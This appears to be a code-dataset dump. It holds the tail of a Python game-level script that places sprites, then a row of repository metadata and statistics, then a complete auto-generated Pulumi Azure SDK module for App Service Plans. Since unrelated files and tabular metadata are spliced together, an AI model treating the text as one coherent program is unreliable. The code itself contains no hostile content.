lb.addObject(Enemy.EnemySprite(x=33, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Star.StarSprite(x=433, y=294,width=32,height=32))
lb.addObject(SpikeyBuddy.SpikeyBuddySprite(x=55, y=293,width=40,height=40,restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Beam.BeamSprite(x=28, y=51,width=51,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=395, y=126,width=170,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=47, y=200,width=89,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=381, y=270,width=191,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Friend.FriendSprite(x=238, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=33, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=187, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=136, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Friend.FriendSprite(x=84, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.render() | 4,715 | 4,715 | 0.748038 | 848 | 4,715 | 4.159198 | 0.09434 | 0.109158 | 0.121633 | 0.177771 | 0.910689 | 0.896796 | 0.882053 | 0.876382 | 0.876382 | 0.876382 | 0 | 0.12248 | 0.032025 | 4,715 | 1 | 4,715 | 4,715 | 0.650307 | 0 | 0 | 0 | 0 | 0 | 0.048134 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0.05 | 0 | 0.075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
237f9bcc4483cf13f27b38442465ce38bb053c97 | 36,669 | py | Python | sdk/python/pulumi_azure/appservice/plan.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/appservice/plan.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure/appservice/plan.py | aangelisc/pulumi-azure | 71dd9c75403146e16f7480e5a60b08bc0329660e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PlanArgs', 'Plan']
@pulumi.input_type
class PlanArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
sku: pulumi.Input['PlanSkuArgs'],
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Plan resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input['PlanSkuArgs'] sku: A `sku` block as documented below.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false` apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`. Defaults to `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "sku", sku)
if app_service_environment_id is not None:
pulumi.set(__self__, "app_service_environment_id", app_service_environment_id)
if is_xenon is not None:
pulumi.set(__self__, "is_xenon", is_xenon)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if location is not None:
pulumi.set(__self__, "location", location)
if maximum_elastic_worker_count is not None:
pulumi.set(__self__, "maximum_elastic_worker_count", maximum_elastic_worker_count)
if name is not None:
pulumi.set(__self__, "name", name)
if per_site_scaling is not None:
pulumi.set(__self__, "per_site_scaling", per_site_scaling)
if reserved is not None:
pulumi.set(__self__, "reserved", reserved)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the App Service Plan component.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> pulumi.Input['PlanSkuArgs']:
"""
A `sku` block as documented below.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: pulumi.Input['PlanSkuArgs']):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="appServiceEnvironmentId")
def app_service_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the App Service Environment where the App Service Plan should be located. Changing forces a new resource to be created.
"""
return pulumi.get(self, "app_service_environment_id")
@app_service_environment_id.setter
def app_service_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "app_service_environment_id", value)
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_xenon")
@is_xenon.setter
def is_xenon(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_xenon", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maximumElasticWorkerCount")
def maximum_elastic_worker_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
"""
return pulumi.get(self, "maximum_elastic_worker_count")
@maximum_elastic_worker_count.setter
def maximum_elastic_worker_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maximum_elastic_worker_count", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="perSiteScaling")
def per_site_scaling(self) -> Optional[pulumi.Input[bool]]:
"""
Can Apps assigned to this App Service Plan be scaled independently? If set to `false` apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
"""
return pulumi.get(self, "per_site_scaling")
@per_site_scaling.setter
def per_site_scaling(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "per_site_scaling", value)
@property
@pulumi.getter
def reserved(self) -> Optional[pulumi.Input[bool]]:
"""
Is this App Service Plan `Reserved`. Defaults to `false`.
"""
return pulumi.get(self, "reserved")
@reserved.setter
def reserved(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reserved", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _PlanState:
def __init__(__self__, *,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
maximum_number_of_workers: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['PlanSkuArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Plan resources.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[int] maximum_number_of_workers: The maximum number of workers supported with the App Service Plan's sku.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false` apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`. Defaults to `false`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input['PlanSkuArgs'] sku: A `sku` block as documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if app_service_environment_id is not None:
pulumi.set(__self__, "app_service_environment_id", app_service_environment_id)
if is_xenon is not None:
pulumi.set(__self__, "is_xenon", is_xenon)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if location is not None:
pulumi.set(__self__, "location", location)
if maximum_elastic_worker_count is not None:
pulumi.set(__self__, "maximum_elastic_worker_count", maximum_elastic_worker_count)
if maximum_number_of_workers is not None:
pulumi.set(__self__, "maximum_number_of_workers", maximum_number_of_workers)
if name is not None:
pulumi.set(__self__, "name", name)
if per_site_scaling is not None:
pulumi.set(__self__, "per_site_scaling", per_site_scaling)
if reserved is not None:
pulumi.set(__self__, "reserved", reserved)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="appServiceEnvironmentId")
def app_service_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the App Service Environment where the App Service Plan should be located. Changing forces a new resource to be created.
"""
return pulumi.get(self, "app_service_environment_id")
@app_service_environment_id.setter
def app_service_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "app_service_environment_id", value)
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_xenon")
@is_xenon.setter
def is_xenon(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_xenon", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maximumElasticWorkerCount")
def maximum_elastic_worker_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
"""
return pulumi.get(self, "maximum_elastic_worker_count")
@maximum_elastic_worker_count.setter
def maximum_elastic_worker_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maximum_elastic_worker_count", value)
@property
@pulumi.getter(name="maximumNumberOfWorkers")
def maximum_number_of_workers(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of workers supported with the App Service Plan's sku.
"""
return pulumi.get(self, "maximum_number_of_workers")
@maximum_number_of_workers.setter
def maximum_number_of_workers(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maximum_number_of_workers", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="perSiteScaling")
def per_site_scaling(self) -> Optional[pulumi.Input[bool]]:
"""
Can Apps assigned to this App Service Plan be scaled independently? If set to `false` apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
"""
return pulumi.get(self, "per_site_scaling")
@per_site_scaling.setter
def per_site_scaling(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "per_site_scaling", value)
@property
@pulumi.getter
def reserved(self) -> Optional[pulumi.Input[bool]]:
"""
Is this App Service Plan `Reserved`. Defaults to `false`.
"""
return pulumi.get(self, "reserved")
@reserved.setter
def reserved(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reserved", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the App Service Plan component.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['PlanSkuArgs']]:
"""
A `sku` block as documented below.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['PlanSkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Plan(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['PlanSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an App Service Plan component.
## Example Usage
### Dedicated)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Shared / Consumption Plan)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="FunctionApp",
sku=azure.appservice.PlanSkuArgs(
tier="Dynamic",
size="Y1",
))
```
### Linux)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="Linux",
reserved=True,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Windows Container)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="xenon",
is_xenon=True,
sku=azure.appservice.PlanSkuArgs(
tier="PremiumContainer",
size="PC2",
))
```
## Import
App Service Plan instances can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/plan:Plan instance1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Web/serverfarms/instance1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false` apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`. Defaults to `false`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input[pulumi.InputType['PlanSkuArgs']] sku: A `sku` block as documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PlanArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an App Service Plan component.
## Example Usage
### Dedicated)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Shared / Consumption Plan)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="FunctionApp",
sku=azure.appservice.PlanSkuArgs(
tier="Dynamic",
size="Y1",
))
```
### Linux)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="Linux",
reserved=True,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Windows Container)
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="xenon",
is_xenon=True,
sku=azure.appservice.PlanSkuArgs(
tier="PremiumContainer",
size="PC2",
))
```
## Import
App Service Plan instances can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/plan:Plan instance1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Web/serverfarms/instance1
```
:param str resource_name: The name of the resource.
:param PlanArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PlanArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['PlanSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PlanArgs.__new__(PlanArgs)
__props__.__dict__["app_service_environment_id"] = app_service_environment_id
__props__.__dict__["is_xenon"] = is_xenon
__props__.__dict__["kind"] = kind
__props__.__dict__["location"] = location
__props__.__dict__["maximum_elastic_worker_count"] = maximum_elastic_worker_count
__props__.__dict__["name"] = name
__props__.__dict__["per_site_scaling"] = per_site_scaling
__props__.__dict__["reserved"] = reserved
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if sku is None and not opts.urn:
raise TypeError("Missing required property 'sku'")
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
__props__.__dict__["maximum_number_of_workers"] = None
super(Plan, __self__).__init__(
'azure:appservice/plan:Plan',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
maximum_number_of_workers: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['PlanSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Plan':
"""
Get an existing Plan resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[int] maximum_number_of_workers: The maximum number of workers supported with the App Service Plan's sku.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false` apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`. Defaults to `false`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input[pulumi.InputType['PlanSkuArgs']] sku: A `sku` block as documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PlanState.__new__(_PlanState)
__props__.__dict__["app_service_environment_id"] = app_service_environment_id
__props__.__dict__["is_xenon"] = is_xenon
__props__.__dict__["kind"] = kind
__props__.__dict__["location"] = location
__props__.__dict__["maximum_elastic_worker_count"] = maximum_elastic_worker_count
__props__.__dict__["maximum_number_of_workers"] = maximum_number_of_workers
__props__.__dict__["name"] = name
__props__.__dict__["per_site_scaling"] = per_site_scaling
__props__.__dict__["reserved"] = reserved
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
return Plan(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="appServiceEnvironmentId")
def app_service_environment_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the App Service Environment where the App Service Plan should be located. Changing forces a new resource to be created.
"""
return pulumi.get(self, "app_service_environment_id")
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "is_xenon")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="maximumElasticWorkerCount")
def maximum_elastic_worker_count(self) -> pulumi.Output[int]:
"""
The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
"""
return pulumi.get(self, "maximum_elastic_worker_count")
@property
@pulumi.getter(name="maximumNumberOfWorkers")
def maximum_number_of_workers(self) -> pulumi.Output[int]:
"""
The maximum number of workers supported with the App Service Plan's sku.
"""
return pulumi.get(self, "maximum_number_of_workers")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="perSiteScaling")
def per_site_scaling(self) -> pulumi.Output[Optional[bool]]:
"""
Can Apps assigned to this App Service Plan be scaled independently? If set to `false` apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
"""
return pulumi.get(self, "per_site_scaling")
@property
@pulumi.getter
def reserved(self) -> pulumi.Output[Optional[bool]]:
"""
Is this App Service Plan `Reserved`. Defaults to `false`.
"""
return pulumi.get(self, "reserved")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the App Service Plan component.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output['outputs.PlanSku']:
"""
A `sku` block as documented below.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
